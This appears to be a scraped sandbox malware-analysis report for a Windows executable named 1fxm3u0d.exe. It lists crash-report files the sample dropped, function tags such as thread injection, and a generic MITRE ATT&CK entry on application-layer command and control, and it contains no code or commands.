Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1fxm3u0d.exe_f4186c4b8eab2dd952d8302a6ce3ee254f527f_b5ec2080_cfe06b34-4b56-4095-b0a6-b528daed48c7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D77.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DC6.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E16.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Windows Analysis Report
1fxm3u0d.exe

Function 001BE1B4 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00173D40 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 292
windowCOMMON

Function 001741B0 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 634
COMMON

Function 00174BD0 Relevance: 3.3, Strings: 2, Instructions: 759
COMMON

Function 001ADC39 Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Function 001A85FC Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Function 001A7256 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 001A7A2F Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 001A1462 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 001A6463 Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Function 001A6DC6 Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Function 0019BDF5 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Function 001769F0 Relevance: 1.7, APIs: 1, Instructions: 155
COMMONLIBRARYCODE

Function 0018FB50 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre